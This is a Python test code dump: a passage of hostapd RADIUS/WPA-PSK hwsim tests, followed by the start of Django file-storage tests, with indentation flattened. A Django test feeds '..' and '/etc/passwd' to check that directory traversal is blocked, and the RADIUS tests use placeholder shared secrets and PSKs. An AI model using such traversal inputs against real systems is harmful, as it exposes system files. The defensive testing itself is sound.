dev[0].dump_monitor()
t_events['double_msg_auth'].set()
connect(dev[0], "radius-test", wait_connect=False)
time.sleep(1)
finally:
t_events['stop'].set()
t.join()
def build_tunnel_password(secret, authenticator, psk):
a = b"\xab\xcd"
psk = psk.encode()
padlen = 16 - (1 + len(psk)) % 16
if padlen == 16:
padlen = 0
p = struct.pack('B', len(psk)) + psk + padlen * b'\x00'
cc_all = bytes()
b = hashlib.md5(secret + authenticator + a).digest()
while len(p) > 0:
pp = bytearray(p[0:16])
p = p[16:]
bb = bytearray(b)
cc = bytearray(pp[i] ^ bb[i] for i in range(len(bb)))
cc_all += cc
b = hashlib.md5(secret + cc).digest()
data = b'\x00' + a + bytes(cc_all)
return data
def start_radius_psk_server(psk, invalid_code=False, acct_interim_interval=0,
session_timeout=0, reject=False):
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
logger.info("Received authentication request")
reply = self.CreateReplyPacket(pkt)
reply.code = pyrad.packet.AccessAccept
if self.t_events['invalid_code']:
reply.code = pyrad.packet.AccessRequest
if self.t_events['reject']:
reply.code = pyrad.packet.AccessReject
data = build_tunnel_password(reply.secret, pkt.authenticator,
self.t_events['psk'])
reply.AddAttribute("Tunnel-Password", data)
if self.t_events['acct_interim_interval']:
reply.AddAttribute("Acct-Interim-Interval",
self.t_events['acct_interim_interval'])
if self.t_events['session_timeout']:
reply.AddAttribute("Session-Timeout",
self.t_events['session_timeout'])
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_events):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_events = t_events
while not t_events['stop'].is_set():
for (fd, event) in self._poll.poll(1000):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
for fd in self.authfds + self.acctfds:
fd.close()
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
b"radius",
"localhost")
srv.BindToAddress("")
t_events = {}
t_events['stop'] = threading.Event()
t_events['psk'] = psk
t_events['invalid_code'] = invalid_code
t_events['acct_interim_interval'] = acct_interim_interval
t_events['session_timeout'] = session_timeout
t_events['reject'] = reject
t = threading.Thread(target=run_pyrad_server, args=(srv, t_events))
t.start()
return t, t_events
def hostapd_radius_psk_test_params():
params = hostapd.radius_params()
params['ssid'] = "test-wpa2-psk"
params["wpa"] = "2"
params["wpa_key_mgmt"] = "WPA-PSK"
params["rsn_pairwise"] = "CCMP"
params['macaddr_acl'] = '2'
params['wpa_psk_radius'] = '2'
params['auth_server_port'] = "18138"
return params
def test_radius_psk(dev, apdev):
"""WPA2 with PSK from RADIUS"""
t, t_events = start_radius_psk_server("12345678")
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412")
t_events['psk'] = "0123456789abcdef"
dev[1].connect("test-wpa2-psk", psk="0123456789abcdef",
scan_freq="2412")
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_during_4way_hs(dev, apdev):
"""WPA2 with PSK from RADIUS during 4-way handshake"""
t, t_events = start_radius_psk_server("12345678")
try:
params = hostapd_radius_psk_test_params()
params['macaddr_acl'] = '0'
params['wpa_psk_radius'] = '3'
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412")
t_events['psk'] = "0123456789abcdef"
dev[1].connect("test-wpa2-psk", psk="0123456789abcdef",
scan_freq="2412")
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_invalid(dev, apdev):
"""WPA2 with invalid PSK from RADIUS"""
t, t_events = start_radius_psk_server("1234567")
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412",
wait_connect=False)
time.sleep(1)
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_invalid2(dev, apdev):
"""WPA2 with invalid PSK (hexstring) from RADIUS"""
t, t_events = start_radius_psk_server(64*'q')
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412",
wait_connect=False)
time.sleep(1)
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_hex_psk(dev, apdev):
"""WPA2 with PSK hexstring from RADIUS"""
t, t_events = start_radius_psk_server(64*'2', acct_interim_interval=19,
session_timeout=123)
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", raw_psk=64*'2', scan_freq="2412")
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_unknown_code(dev, apdev):
"""WPA2 with PSK from RADIUS and unknown code"""
t, t_events = start_radius_psk_server(64*'2', invalid_code=True)
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412",
wait_connect=False)
time.sleep(1)
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_reject(dev, apdev):
"""WPA2 with PSK from RADIUS and reject"""
t, t_events = start_radius_psk_server("12345678", reject=True)
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-AUTH-REJECT"], timeout=10)
if ev is None:
raise Exception("No CTRL-EVENT-AUTH-REJECT event")
dev[0].request("DISCONNECT")
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_reject_during_4way_hs(dev, apdev):
"""WPA2 with PSK from RADIUS and reject"""
t, t_events = start_radius_psk_server("12345678", reject=True)
try:
params = hostapd_radius_psk_test_params()
params['macaddr_acl'] = '0'
params['wpa_psk_radius'] = '3'
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412",
wait_connect=False)
dev[0].wait_disconnected()
dev[0].request("DISCONNECT")
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_oom(dev, apdev):
"""WPA2 with PSK from RADIUS and OOM"""
t, t_events = start_radius_psk_server(64*'2')
try:
params = hostapd_radius_psk_test_params()
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
dev[0].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "=hostapd_acl_recv_radius"):
dev[0].connect("test-wpa2-psk", psk="12345678", scan_freq="2412",
wait_connect=False)
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
finally:
t_events['stop'].set()
t.join()
def test_radius_sae_password(dev, apdev):
"""WPA3 with SAE password from RADIUS"""
t, t_events = start_radius_psk_server("12345678")
try:
params = hostapd_radius_psk_test_params()
params['ssid'] = "test-wpa3-sae"
params["wpa_key_mgmt"] = "SAE"
params['ieee80211w'] = '2'
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("test-wpa3-sae", sae_password="12345678", key_mgmt="SAE",
ieee80211w="2", scan_freq="2412")
t_events['psk'] = "0123456789abcdef"
dev[1].connect("test-wpa3-sae", sae_password="0123456789abcdef",
key_mgmt="SAE", ieee80211w="2", scan_freq="2412")
finally:
t_events['stop'].set()
t.join()
def test_radius_psk_default(dev, apdev):
"""WPA2 with default PSK"""
ssid = "test-wpa2-psk"
params = hostapd.radius_params()
params['ssid'] = ssid
params["wpa"] = "2"
params["wpa_key_mgmt"] = "WPA-PSK"
params["rsn_pairwise"] = "CCMP"
params['macaddr_acl'] = '2'
params['wpa_psk_radius'] = '1'
params['wpa_passphrase'] = 'qwertyuiop'
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect(ssid, psk="qwertyuiop", scan_freq="2412")
dev[0].dump_monitor()
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].dump_monitor()
hapd.disable()
hapd.set("wpa_psk_radius", "2")
hapd.enable()
dev[0].connect(ssid, psk="qwertyuiop", scan_freq="2412", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-AUTH-REJECT"], timeout=10)
if ev is None:
raise Exception("No CTRL-EVENT-AUTH-REJECT event")
dev[0].request("DISCONNECT")
def test_radius_auth_force_client_addr(dev, apdev):
"""RADIUS client address specified"""
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['radius_client_addr'] = "127.0.0.1"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth")
def test_radius_auth_force_client_dev(dev, apdev):
"""RADIUS client device specified"""
params = hostapd.wpa2_eap_params(ssid="radius-auth")
params['radius_client_dev'] = "lo"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth")
@remote_compatible
def test_radius_auth_force_invalid_client_addr(dev, apdev):
"""RADIUS client address specified and invalid address"""
params = hostapd.wpa2_eap_params(ssid="radius-auth")
#params['radius_client_addr'] = "10.11.12.14"
params['radius_client_addr'] = "1::2"
hapd = hostapd.add_ap(apdev[0], params)
connect(dev[0], "radius-auth", wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-EAP-STARTED"])
if ev is None:
raise Exception("Timeout on EAP start")
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED"], timeout=1)
if ev is not None:
raise Exception("Unexpected connection")
def add_message_auth(req):
req.authenticator = req.CreateAuthenticator()
hmac_obj = hmac.new(req.secret, digestmod=hashlib.md5)
hmac_obj.update(struct.pack("B", req.code))
hmac_obj.update(struct.pack("B", req.id))
# request attributes
req.AddAttribute("Message-Authenticator", 16*b"\x00")
attrs = req._PktEncodeAttributes()
# Length
flen = 4 + 16 + len(attrs)
hmac_obj.update(struct.pack(">H", flen))
hmac_obj.update(req.authenticator)
hmac_obj.update(attrs)
del req[80]
req.AddAttribute("Message-Authenticator", hmac_obj.digest())
def test_radius_server_failures(dev, apdev):
"""RADIUS server failure cases"""
try:
import pyrad.client
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
dict = pyrad.dictionary.Dictionary("dictionary.radius")
client = pyrad.client.Client(server="127.0.0.1", authport=1812,
secret=b"radius", dict=dict)
client.retries = 1
client.timeout = 1
# unexpected State
req = client.CreateAuthPacket(code=pyrad.packet.AccessRequest,
User_Name="foo")
req['State'] = b'foo-state'
add_message_auth(req)
reply = client.SendPacket(req)
if reply.code != pyrad.packet.AccessReject:
raise Exception("Unexpected RADIUS response code " + str(reply.code))
# no EAP-Message
req = client.CreateAuthPacket(code=pyrad.packet.AccessRequest,
User_Name="foo")
add_message_auth(req)
try:
reply = client.SendPacket(req)
raise Exception("Unexpected response")
except pyrad.client.Timeout:
pass
def test_ap_vlan_wpa2_psk_radius_required(dev, apdev):
"""AP VLAN with WPA2-PSK and RADIUS attributes required"""
try:
import pyrad.server
import pyrad.packet
import pyrad.dictionary
except ImportError:
raise HwsimSkip("No pyrad modules available")
class TestServer(pyrad.server.Server):
def _HandleAuthPacket(self, pkt):
pyrad.server.Server._HandleAuthPacket(self, pkt)
logger.info("Received authentication request")
reply = self.CreateReplyPacket(pkt)
reply.code = pyrad.packet.AccessAccept
secret = reply.secret
if self.t_events['extra'].is_set():
reply.AddAttribute("Chargeable-User-Identity", "test-cui")
reply.AddAttribute("User-Name", "test-user")
if self.t_events['long'].is_set():
reply.AddAttribute("Tunnel-Type", 13)
reply.AddAttribute("Tunnel-Medium-Type", 6)
reply.AddAttribute("Tunnel-Private-Group-ID", "1")
self.SendReplyPacket(pkt.fd, reply)
def RunWithStop(self, t_events):
self._poll = select.poll()
self._fdmap = {}
self._PrepareSockets()
self.t_events = t_events
while not t_events['stop'].is_set():
for (fd, event) in self._poll.poll(1000):
if event == select.POLLIN:
try:
fdo = self._fdmap[fd]
self._ProcessInput(fdo)
except pyrad.server.ServerPacketError as err:
logger.info("pyrad server dropping packet: " + str(err))
except pyrad.packet.PacketError as err:
logger.info("pyrad server received invalid packet: " + str(err))
else:
logger.error("Unexpected event in pyrad server main loop")
for fd in self.authfds + self.acctfds:
fd.close()
srv = TestServer(dict=pyrad.dictionary.Dictionary("dictionary.radius"),
authport=18138, acctport=18139)
srv.hosts["127.0.0.1"] = pyrad.server.RemoteHost("127.0.0.1",
b"radius",
"localhost")
srv.BindToAddress("")
t_events = {}
t_events['stop'] = threading.Event()
t_events['long'] = threading.Event()
t_events['extra'] = threading.Event()
t = threading.Thread(target=run_pyrad_server, args=(srv, t_events))
t.start()
try:
ssid = "test-wpa2-psk"
params = hostapd.radius_params()
params['ssid'] = ssid
params["wpa"] = "2"
params["wpa_key_mgmt"] = "WPA-PSK"
params["rsn_pairwise"] = "CCMP"
params['macaddr_acl'] = '2'
params['dynamic_vlan'] = "2"
params['wpa_passphrase'] = '0123456789abcdefghi'
params['auth_server_port'] = "18138"
hapd = hostapd.add_ap(apdev[0], params)
logger.info("connecting without VLAN")
dev[0].connect(ssid, psk="0123456789abcdefghi", scan_freq="2412",
wait_connect=False)
ev = dev[0].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-SSID-TEMP-DISABLED"], timeout=20)
if ev is None:
raise Exception("Timeout on connection attempt")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected success without vlan parameters")
logger.info("connecting without VLAN failed as expected")
logger.info("connecting without VLAN (CUI/User-Name)")
t_events['extra'].set()
dev[1].connect(ssid, psk="0123456789abcdefghi", scan_freq="2412",
wait_connect=False)
ev = dev[1].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-SSID-TEMP-DISABLED"], timeout=20)
if ev is None:
raise Exception("Timeout on connection attempt")
if "CTRL-EVENT-CONNECTED" in ev:
raise Exception("Unexpected success without vlan parameters(2)")
logger.info("connecting without VLAN failed as expected(2)")
t_events['extra'].clear()
t_events['long'].set()
logger.info("connecting with VLAN")
dev[2].connect(ssid, psk="0123456789abcdefghi", scan_freq="2412",
wait_connect=False)
ev = dev[2].wait_event(["CTRL-EVENT-CONNECTED",
"CTRL-EVENT-SSID-TEMP-DISABLED"], timeout=20)
if ev is None:
raise Exception("Timeout on connection attempt")
if "CTRL-EVENT-SSID-TEMP-DISABLED" in ev:
raise Exception("Unexpected failure with vlan parameters")
logger.info("connecting with VLAN succeeded as expected")
finally:
t_events['stop'].set()
t.join()
def test_radius_mppe_failure(dev, apdev):
"""RADIUS failure when adding MPPE keys"""
params = {"ssid": "as", "beacon_int": "2000",
"radius_server_clients": "auth_serv/radius_clients.conf",
"radius_server_auth_port": '18127',
"eap_server": "1",
"eap_user_file": "auth_serv/eap_user.conf",
"ca_cert": "auth_serv/ca.pem",
"server_cert": "auth_serv/server.pem",
"private_key": "auth_serv/server.key"}
authsrv = hostapd.add_ap(apdev[1], params)
params = hostapd.wpa2_eap_params(ssid="test-wpa2-eap")
params['auth_server_port'] = "18127"
hapd = hostapd.add_ap(apdev[0], params)
with fail_test(authsrv, 1, "os_get_random;radius_msg_add_mppe_keys"):
dev[0].connect("test-wpa2-eap", key_mgmt="WPA-EAP", eap="TTLS",
identity="user", anonymous_identity="ttls",
password="password",
ca_cert="auth_serv/ca.pem", phase2="autheap=GTC",
wait_connect=False, scan_freq="2412")
dev[0].wait_disconnected()
dev[0].request("REMOVE_NETWORK all")
def test_radius_acct_failure(dev, apdev):
"""RADIUS Accounting and failure to add attributes"""
# Connection goes through, but Accounting-Request cannot be sent out due to
# NAS-Identifier being too long to fit into a RADIUS attribute.
params = {"ssid": "radius-acct-open",
'acct_server_addr': "127.0.0.1",
'acct_server_port': "1813",
'acct_server_shared_secret': "radius",
'nas_identifier': 255*'A'}
hapd = hostapd.add_ap(apdev[0], params)
dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
def test_radius_acct_failure_oom(dev, apdev):
"""RADIUS Accounting and failure to add attributes due to OOM"""
params = {"ssid": "radius-acct-open",
'acct_server_addr': "127.0.0.1",
'acct_server_port': "1813",
'acct_server_shared_secret': "radius",
'radius_acct_interim_interval': "1",
'nas_identifier': 250*'A',
'radius_acct_req_attr': ["126:s:" + 250*'B',
"77:s:" + 250*'C',
"127:s:" + 250*'D',
"181:s:" + 250*'E']}
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
dev[0].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_msg"):
dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[1].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "accounting_sta_report"):
dev[1].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
dev[1].request("REMOVE_NETWORK all")
dev[1].wait_disconnected()
tests = [(1, "radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_msg"),
(2, "radius_msg_add_attr;accounting_msg"),
(3, "radius_msg_add_attr;accounting_msg")]
for count, func in tests:
with fail_test(hapd, count, func):
dev[0].connect("radius-acct-open", key_mgmt="NONE",
scan_freq="2412")
wait_fail_trigger(hapd, "GET_FAIL")
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
with fail_test(hapd, 8,
"radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_sta_report"):
dev[0].request("REMOVE_NETWORK all")
dev[0].wait_disconnected()
wait_fail_trigger(hapd, "GET_FAIL")
with fail_test(hapd, 1, "radius_msg_add_attr;=accounting_report_state"):
hapd.disable()
def test_radius_acct_failure_oom_rsn(dev, apdev):
"""RADIUS Accounting in RSN and failure to add attributes due to OOM"""
params = hostapd.wpa2_eap_params(ssid="radius-acct")
params['acct_server_addr'] = "127.0.0.1"
params['acct_server_port'] = "1813"
params['acct_server_shared_secret'] = "radius"
params['radius_acct_interim_interval'] = "1"
params['nas_identifier'] = 250*'A'
params['radius_acct_req_attr'] = ["126:s:" + 250*'B',
"77:s:" + 250*'C',
"127:s:" + 250*'D',
"181:s:" + 250*'E']
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
dev[0].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_msg"):
connect(dev[0], "radius-acct")
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
dev[1].scan_for_bss(bssid, freq="2412")
with alloc_fail(hapd, 1, "accounting_sta_report"):
connect(dev[1], "radius-acct")
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
dev[2].scan_for_bss(bssid, freq="2412")
connect(dev[2], "radius-acct")
for i in range(1, 8):
with alloc_fail(hapd, i, "radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_msg"):
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
for i in range(1, 15):
with alloc_fail(hapd, i, "radius_msg_add_attr;?radius_msg_add_attr_int32;=accounting_sta_report"):
wait_fail_trigger(hapd, "GET_ALLOC_FAIL")
def test_radius_acct_failure_sta_data(dev, apdev):
"""RADIUS Accounting and failure to get STA data"""
params = {"ssid": "radius-acct-open",
'acct_server_addr': "127.0.0.1",
'acct_server_port': "1813",
'acct_server_shared_secret': "radius"}
hapd = hostapd.add_ap(apdev[0], params)
with fail_test(hapd, 1, "accounting_sta_update_stats"):
dev[0].connect("radius-acct-open", key_mgmt="NONE", scan_freq="2412")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
hapd.wait_event(["AP-STA-DISCONNECTED"], timeout=1)
|
tests.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, unicode_literals
import errno
import os
import shutil
import sys
import tempfile
import time
import zlib
from datetime import datetime, timedelta
from io import BytesIO
try:
import threading
except ImportError:
import dummy_threading as threading
from django.conf import settings
from django.core.exceptions import SuspiciousOperation, ImproperlyConfigured
from django.core.files.base import File, ContentFile
from django.core.files.images import get_image_dimensions
from django.core.files.storage import FileSystemStorage, get_storage_class
from django.core.files.uploadedfile import UploadedFile
from django.test import LiveServerTestCase, SimpleTestCase
from django.test.utils import override_settings
from django.utils import six
from django.utils import unittest
from django.utils.six.moves.urllib.request import urlopen
from django.utils._os import upath
try:
from django.utils.image import Image
except ImproperlyConfigured:
Image = None
class GetStorageClassTests(SimpleTestCase):
def test_get_filesystem_storage(self):
"""
get_storage_class returns the class for a storage backend name/path.
"""
self.assertEqual(
get_storage_class('django.core.files.storage.FileSystemStorage'),
FileSystemStorage)
def test_get_invalid_storage_module(self):
"""
get_storage_class raises an error if the requested import don't exist.
"""
with six.assertRaisesRegex(self, ImproperlyConfigured,
"Error importing module storage: \"No module named '?storage'?\""):
get_storage_class('storage.NonExistingStorage')
def test_get_nonexisting_storage_class(self):
"""
get_storage_class raises an error if the requested class don't exist.
"""
self.assertRaisesMessage(
ImproperlyConfigured,
'Module "django.core.files.storage" does not define a '
'"NonExistingStorage" attribute/class',
get_storage_class,
'django.core.files.storage.NonExistingStorage')
def test_get_nonexisting_storage_module(self):
"""
get_storage_class raises an error if the requested module don't exist.
"""
# Error message may or may not be the fully qualified path.
with six.assertRaisesRegex(self, ImproperlyConfigured,
"Error importing module django.core.files.non_existing_storage: "
"\"No module named '?(django.core.files.)?non_existing_storage'?\""):
get_storage_class(
'django.core.files.non_existing_storage.NonExistingStorage')
class FileStorageTests(unittest.TestCase):
storage_class = FileSystemStorage
def setUp(self):
self.temp_dir = tempfile.mkdtemp()
self.storage = self.storage_class(location=self.temp_dir,
base_url='/test_media_url/')
# Set up a second temporary directory which is ensured to have a mixed
# case name.
self.temp_dir2 = tempfile.mkdtemp(suffix='aBc')
def tearDown(self):
shutil.rmtree(self.temp_dir)
shutil.rmtree(self.temp_dir2)
def test_emtpy_location(self):
"""
Makes sure an exception is raised if the location is empty
"""
storage = self.storage_class(location='')
self.assertEqual(storage.base_location, '')
self.assertEqual(storage.location, upath(os.getcwd()))
def test_file_access_options(self):
"""
Standard file access options are available, and work as expected.
"""
self.assertFalse(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'w')
f.write('storage contents')
f.close()
self.assertTrue(self.storage.exists('storage_test'))
f = self.storage.open('storage_test', 'r')
self.assertEqual(f.read(), 'storage contents')
f.close()
self.storage.delete('storage_test')
self.assertFalse(self.storage.exists('storage_test'))
def test_file_accessed_time(self):
"""
File storage returns a Datetime object for the last accessed time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
atime = self.storage.accessed_time(f_name)
self.assertEqual(atime, datetime.fromtimestamp(
os.path.getatime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.accessed_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_created_time(self):
"""
File storage returns a Datetime object for the creation time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
ctime = self.storage.created_time(f_name)
self.assertEqual(ctime, datetime.fromtimestamp(
os.path.getctime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.created_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_modified_time(self):
"""
File storage returns a Datetime object for the last modified time of
a file.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
mtime = self.storage.modified_time(f_name)
self.assertEqual(mtime, datetime.fromtimestamp(
os.path.getmtime(self.storage.path(f_name))))
self.assertTrue(datetime.now() - self.storage.modified_time(f_name) < timedelta(seconds=2))
self.storage.delete(f_name)
def test_file_save_without_name(self):
"""
File storage extracts the filename from the content object if no
name is given explicitly.
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f.name = 'test.file'
storage_f_name = self.storage.save(None, f)
self.assertEqual(storage_f_name, f.name)
self.assertTrue(os.path.exists(os.path.join(self.temp_dir, f.name)))
self.storage.delete(storage_f_name)
def test_file_save_with_path(self):
"""
Saving a pathname should create intermediate directories as necessary.
"""
self.assertFalse(self.storage.exists('path/to'))
self.storage.save('path/to/test.file',
ContentFile('file saved with path'))
self.assertTrue(self.storage.exists('path/to'))
with self.storage.open('path/to/test.file') as f:
self.assertEqual(f.read(), b'file saved with path')
self.assertTrue(os.path.exists(
os.path.join(self.temp_dir, 'path', 'to', 'test.file')))
self.storage.delete('path/to/test.file')
def test_file_path(self):
"""
File storage returns the full path of a file
"""
self.assertFalse(self.storage.exists('test.file'))
f = ContentFile('custom contents')
f_name = self.storage.save('test.file', f)
self.assertEqual(self.storage.path(f_name),
os.path.join(self.temp_dir, f_name))
self.storage.delete(f_name)
def test_file_url(self):
"""
File storage returns a url to access a given file from the Web.
"""
self.assertEqual(self.storage.url('test.file'),
'%s%s' % (self.storage.base_url, 'test.file'))
# should encode special chars except ~!*()'
# like encodeURIComponent() JavaScript function do
self.assertEqual(self.storage.url(r"""~!*()'@#$%^&*abc`+ =.file"""),
"""/test_media_url/~!*()'%40%23%24%25%5E%26*abc%60%2B%20%3D.file""")
# should stanslate os path separator(s) to the url path separator
self.assertEqual(self.storage.url("""a/b\\c.file"""),
"""/test_media_url/a/b/c.file""")
self.storage.base_url = None
self.assertRaises(ValueError, self.storage.url, 'test.file')
def test_listdir(self):
"""
File storage returns a tuple containing directories and files.
"""
self.assertFalse(self.storage.exists('storage_test_1'))
self.assertFalse(self.storage.exists('storage_test_2'))
self.assertFalse(self.storage.exists('storage_dir_1'))
f = self.storage.save('storage_test_1', ContentFile('custom content'))
f = self.storage.save('storage_test_2', ContentFile('custom content'))
os.mkdir(os.path.join(self.temp_dir, 'storage_dir_1'))
dirs, files = self.storage.listdir('')
self.assertEqual(set(dirs), set(['storage_dir_1']))
self.assertEqual(set(files),
set(['storage_test_1', 'storage_test_2']))
self.storage.delete('storage_test_1')
self.storage.delete('storage_test_2')
os.rmdir(os.path.join(self.temp_dir, 'storage_dir_1'))
def test_file_storage_prevents_directory_traversal(self):
"""
File storage prevents directory traversal (files can only be accessed if
they're below the storage location).
"""
self.assertRaises(SuspiciousOperation, self.storage.exists, '..')
self.assertRaises(SuspiciousOperation, self.storage.exists, '/etc/passwd')
def test_file_storage_preserves_filename_case(self):
"""The storage backend should preserve case of filenames."""
# Create a storage backend associated with the mixed case name
# directory.
temp_storage = self.storage_class(location=self.temp_dir2)
# Ask that storage backend to store a file with a mixed case filename.
mixed_case = 'CaSe_SeNsItIvE'
file = temp_storage.open(mixed_case, 'w')
file.write('storage contents')
file.close()
self.assertEqual(os.path.join(self.temp_dir2, mixed_case),
temp_storage.path(mixed_case))
temp_storage.delete(mixed_case)
def test_makedirs_race_handling(self):
"""
File storage should be robust against directory creation race conditions.
"""
real_makedirs = os.makedirs
# Monkey-patch os.makedirs, to simulate a normal call, a raced call,
# and an error.
def fake_makedirs(path):
if path == os.path.join(self.temp_dir, 'normal'):
real_makedirs(path)
elif path == os.path.join(self.temp_dir, 'raced'):
real_makedirs(path)
raise OSError(errno.EEXIST, 'simulated EEXIST')
elif path == os.path.join(self.temp_dir, 'error'):
raise OSError(errno.EACCES, 'simulated EACCES')
else:
self.fail('unexpected argument %r' % path)
try:
os.makedirs = fake_makedirs
self.storage.save('normal/test.file',
ContentFile('saved normally'))
with self.storage.open('normal/test.file') as f:
self.assertEqual(f.read(), b'saved normally')
self.storage.save('raced/test.file',
ContentFile('saved with race'))
with self.storage.open('raced/test.file') as f:
self.assertEqual(f.read(), b'saved with race')
# Check that OSErrors aside from EEXIST are still raised.
self.assertRaises(OSError,
self.storage.save, 'error/test.file', ContentFile('not saved'))
finally:
os.makedirs = real_makedirs
def test_remove_race_handling(self):
"""
File storage should be robust against file removal race conditions.
"""
real_remove = os.remove
# Monkey-patch os.remove, to simulate a normal call, a raced call,
# and an error.
def fake_remove(path):
if path == os.path.join(self.temp_dir, 'normal.file'):
real_remove(path)
elif path == os.path.join(self.temp_dir, 'raced.file'):
real_remove(path)
raise OSError(errno.ENOENT, 'simulated ENOENT')
elif path == os.path.join(self.temp_dir, 'error.file'):
raise OSError(errno.EACCES, 'simulated EACCES')
else:
self.fail('unexpected argument %r' % path)
try:
os.remove = fake_remove
self.storage.save('normal.file', ContentFile('delete normally'))
self.storage.delete('normal.file')
self.assertFalse(self.storage.exists('normal.file'))
self.storage.save('raced.file', ContentFile('delete with race'))
self.storage.delete('raced.file')
self.assertFalse(self.storage.exists('normal.file'))
# Check that OSErrors aside from ENOENT are still raised.
self.storage.save('error.file', ContentFile('delete with error'))
self.assertRaises(OSError, self.storage.delete, 'error.file')
finally:
os.remove = real_remove
def test_file_chunks_error(self):
"""
Test behaviour when file.chunks() is raising an error
"""
f1 = ContentFile('chunks fails')
def failing_chunks():
raise IOError
f1.chunks = failing_chunks
with self.assertRaises(IOError):
self.storage.save('error.file', f1)
def test_delete_no_name(self):
"""
Calling delete with an empty name should not try to remove the base
storage directory, but fail loudly (#20660).
"""
with self.assertRaises(AssertionError):
self.storage.delete('')
class CustomStorage(FileSystemStorage):
def get_available_name(self, name):
"""
Append numbers to duplicate files rather than underscores, like Trac.
"""
parts = name.split('.')
basename, ext = parts[0], parts[1:]
number = 2
